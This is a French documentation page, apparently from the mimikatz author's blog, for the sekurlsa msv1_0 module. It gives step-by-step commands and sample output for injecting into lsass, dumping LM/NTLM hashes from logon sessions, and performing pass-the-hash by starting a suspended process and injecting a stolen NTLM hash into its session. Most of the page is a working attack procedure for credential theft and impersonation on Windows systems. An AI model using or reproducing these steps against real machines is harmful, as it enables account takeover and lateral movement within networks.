sekurlsa :: msv1_0

msv1_0

Librairie de manipulation du provider MSV1_0
La partie « pass the hash » de sekurlsa

Avant d’utiliser les méthodes offertes, il convient d’avoir injecté la librairie sekurlsa dans le processus lsass : http://blog.gentilkiwi.com/mimikatz/sekurlsa

Méthodes offertes :

@ getMSV , @ getLogonSessions

Description : Énumère les sessions courantes du provider MSV1_0
Arguments : n.a.
Exemple : @getMSV, @getLogonSessions

mimikatz # @getLogonSessions

Authentification Id         : 0;86072
Package d'authentification  : NTLM
Utilisateur principal       : Administrateur
Domaine d'authentification  : MININT-KZ6POK
        msv1_0 :        lm{ d0e9aee149655a6075e4540af1f22d3b }, ntlm{ cc36cf7a8514893efccd332446158b1a }

@ addLogonSession

Description : Ajoute une authentification LM/NTLM à une session d’authentification existante
Arguments :

  • idSecAppHighoptionnel, partie haute de l’ID d’authentification ; par défaut 0
  • idSecAppLow – partie basse de l’ID d’authentification
  • utilisateur – nom de l’utilisateur associé au hash
  • domaine|poste – domaine de connexion, hors domaine : utiliser le nom de machine
  • hashLMoptionnel, hash LanMan sous forme hexadécimale
  • hashNTLM – hash NTLM sous forme hexadécimale

Remarques :

  • les hashs LM ou NTLM peuvent être obtenus via : @getLogonSessions, @getLocalAccounts, samdump::hashes ou tout autre source externe
  • une authentification pour un nouveau processus peut être créée via : process::start /paused /sudo cmd
  • démarrer un processus en pause n’est pas obligatoire, mais reste recommandé pour éviter un début de négociation

Exemple : @addLogonSession 596909 Client DOMCONNECT 69524a95ec96f8053be69a3f7cdb3621

mimikatz # process::start /paused /sudo cmd
Demande d'exécution de : 'cmd'
 * Le Thread principal est suspendu ! Reprise avec : thread::resume 2700
 * Le processus est démarré avec de fausses données d'identification
PID      : 2696
ThreadID : 2700
AuthId_h : 0
AuthId_l : 596909

mimikatz # @addLogonSession 596909 Client DOMCONNECT 69524a95ec96f8053be69a3f7cdb3621
Injection de données de sécurité réussie :)

mimikatz # thread::resume 2700
thread  2700    reprise OK

@ delLogonSession

Description : Supprime une authentification LM/NTLM d’une session d’authentification existante
Arguments :

  • idSecAppHigh - optionnel, partie haute de l'ID d'authentification ; par défaut 0
  • idSecAppLow - partie basse de l'ID d'authentification

Exemple : @delLogonSession 596909

mimikatz # @delLogonSession 596909
Suppression des données de sécurité réussie :)

@ getMSVFunctions

Description : Affiche les fonctions du provider MSV1_0 nécessaires aux manipulations
Arguments : n.a.
Exemple : @getMSVFunctions

mimikatz # @getMSVFunctions
** msv1_0.dll ** ; Statut recherche : OK :)

@GetPrimaryCredential    = 753C2917
@AddPrimaryCredential    = 753CAC99
@DeletePrimaryCredential = 753C1B24

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

*

Vous pouvez utiliser ces balises et attributs HTML : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>